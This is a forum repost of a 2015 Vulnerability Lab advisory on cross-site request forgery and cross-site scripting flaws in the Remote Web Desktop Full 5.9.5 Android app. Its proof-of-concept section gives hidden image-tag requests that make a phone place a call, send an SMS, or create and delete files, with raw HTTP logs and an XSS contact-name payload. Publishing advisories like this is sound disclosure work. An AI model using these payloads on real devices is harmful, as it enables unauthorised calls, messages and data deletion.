Jump to content
1488

Remote Web Desktop Full 5.9.5 Cross Site Request Forgery / Cross Site Scripting

Recommended Posts

Document Title:
===============
Remote Web Desktop Full 5.9.5 - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1409


Release Date:
=============
2015-01-19


Vulnerability Laboratory ID (VL-ID):
====================================
1409


Common Vulnerability Scoring System:
====================================
2.4


Product & Service Introduction:
===============================
Remote Web Desktop enable you remotely manage & control your Android device from the computer web browser over wireless connection.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=net.xdevelop.rmp )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Web Desktop Full v5.9.5 Android application.


Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SmartDog Studio HK
Product: Remote Web Desktop Full 5.9.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple cross site request forgery and cross site scripting vulnerabilities has been discovered in the Remote Web Desktop Full 5.9.5 Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and cross site scripting attacks.

1.1
The cross site scripting vulnerabilities are located in `to` value of the `sendSMS.json` file in the send sms function.
The attackers needs to `Create new a contact` or `Create a contact group` with a malicious payload as name to inject.
The execution occurs after the refresh inside of the main message module.

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] to

1.2
The cross site request forgery vulnerabilities are located in the `makeCall.json`,`sendSMS.json`,`addTextFile.json`,
`deleteFile.json` files. Remote attackers are able prepare special crafted URLs that executes client-side requests
to execute application functions (delete,add, call, send).

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] makeCall.json
[+] sendSMS.json
[+] addTextFile.json
[+] deleteFile.json


Proof of Concept (PoC):
=======================
1.1
The cross site request forgery vulnerability can be exploited by remote attackers without privileged application user account and with medium or high user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Call Phone Number
<img src="http://localhost:8999/makeCall.json?phoneNo=11111111111" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /makeCall.json?phoneNo=11111111111 HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
true


Send SMS:
--- PoC Session Logs [GET] (Execution) ---
<img src="http://localhost:8999/sendSMS.json?to=333&content=Hello""width="0" height="0" border="0">

GET /sendSMS.json?to=333&content=Hello HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

SMS to 333 sent successfully


Create File:
--- PoC Session Logs [GET] (Execution) ---
<img src="http://localhost:8999/addTextFile.json?id=/folder&name=file" width="0" height="0" border="0">

GET /addTextFile.json?id=/folder/&name=file HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 26

/folder/file


Delete File:
<img src="http://localhost:8999/deleteFile.json?id=/file" width="0" height="0" border="0">

GET /deleteFile.json?id=%2Fmnt%2Femmc%2Faissak%7C HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
true

Reference:
http://localhost:8999/


1.2
The application-side input validation web vulnerabilities can be exploited by local low privileged application account or remote attackers with low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Application-Side Cross Site Scripting
--- PoC Session Logs [GET] (Execution) ---
GET /sendSMS.json?to=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&content=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&uid=1421297818963 HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=utf-8
Referer: http://192.168.1.3:8999/
Cookie: RemoteMobileSession=-6603034196170561541
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 68

SMS to <img src=x onerror=alert(/XSS/)> sent failed: Unknown Error

--- PoC Session Logs [GET] (Execution) ---
Create new a contact or a contact group with the payload as name "<img src=x onerror=alert(/XSS/)>" and click the contact button to save


Reference:
http://localhost:8999/


Security Risk:
==============
1.1
The security risk of the cross site request forgery web vulnerabilities are estimated as medium. (CVSS 2.2)

1.2
The security risk of the application-side input validation web vulnerability is estimated as medium. (CVSS 2.4)


Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Source : Remote Web Desktop Full 5.9.5 Cross Site Request Forgery / Cross Site Scripting ? Packet Storm

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...